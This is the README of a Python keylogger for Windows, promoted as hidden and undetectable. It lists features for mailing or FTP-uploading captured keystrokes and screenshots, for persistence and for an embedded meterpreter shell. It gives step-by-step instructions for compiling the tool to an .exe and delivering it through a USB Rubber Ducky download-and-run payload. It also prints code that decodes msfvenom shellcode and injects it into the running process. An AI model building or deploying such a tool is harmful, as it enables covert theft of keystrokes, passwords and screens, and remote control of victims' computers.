Puffader is an opensource, hidden and undetectable keylogger for windows written in Python 2.7 which can also capture screenshots and mouse window clicks.
Puffader Requires:
Please refer to the wiki for more information on installing prerequisites.
The program can be downloaded via github or git eg.
git clone https://github.com/xp4xbox/Puffader
Currently Puffader has several features such as:
- Ability to send logs to any gmail account.
- Ability to send logs via ftp
- Ability to capture screenshots
- Ability to store logs locally
- Ability to configure log size before sending
- Ability to send logs at timed intervals
- Ability to control how you want the backspace key to be outputed as.
- Ability to stop the program via ctrl-rshift-h.
- Ability to log special characters.
- Ability to embed an undetectable meterpreter shell
- Optional persistence.
- Ability to capture window mouse clicks
- Checking for multiple instances
- USB Rubber Ducky payload
- And more...
- Open file with idle or any other editor.
- Modifiy lines
22-45
for your personal preference: eg.
strEmailAc = "[email protected]"
strEmailPass = "pass"
blnFTP = "False"
strFtpServer = ""
intFtpPort = 21
strFtpUser = ""
strFtpPass = ""
strFtpRemotePath = "/"
intCharPerSend = 1000
blnUseTime = "False"
intTimePerSend = 120
blnStoreLocal = "True"
strLogFile = "c:/temp/test.txt"
blnLogClick = "True"
blnBackRemove = "True"
blnScrShot = "True"
strScrDir = "c:/temp"
intScrTime = 120
NOTE: For
strScrDir
, be sure to leave out the last/
.
If you plan to send messages via email, be sure to allow access for less secure apps in your gmail account.
For more information please refer to the wiki.
- Add this code to Puffader.py
sys.stderr = None
after the import statements to ensure no errors will show. - Install Py2Exe.
- Run
python setup.py
- Add this code to Puffader.py
sys.stderr = None
after the import statements to ensure no errors will show. - Install cx_Freeze via
pip install cx_freeze
. - Run
python cx_freeze_setup.py build
.
Or refer to the wiki for more information.
Please refer to the wiki.
- Zip the compiled .exe's folder and upload it to any file sharing service.
- Edit payload.ps1 setting
$url
to be the direct link to the .zip.$ZipName
to be the .zip name and$strFileDir
to be the folder name inside the .zip file. - Upload your payload.ps1 as well.
- Set
$url
in inject.txt to be the direct link for payload.ps1. - Encode to inject.bin using my encoder or any other one.
TIP: Forking this project and using personal rep for changes is a alternative way to host the files.
- Generate raw shellcode using msfvenom (eg. xr8\x02...).
- Encode the shellcode to base64 by using this.
- Move the code_injector module to same dir as the program.
- Paste in this code after the function to prevent multiple instances as here. Setting b64shellcode to be your encrypted shellcode.
import code_injector, base64
# base64 shellcode
b64shellcode = ""
shellcode = base64.b64decode(b64shellcode) # decrypt shellcode
pid = os.getpid() # get current pid
code_injector.InjectShellCode(pid, shellcode) # inject the shellcode into the program
- Build program with Py2Exe using setup.py to compile the program to single .exe.
Check my other project PyEvade for more info on how this works.
If you need any help at all, feel free to post a "help" issue.
Contributing is encouraged and will help make a better program. Please refer to this before contributing.
This program must be used for legal purposes! I am not responsible for anything you do with it.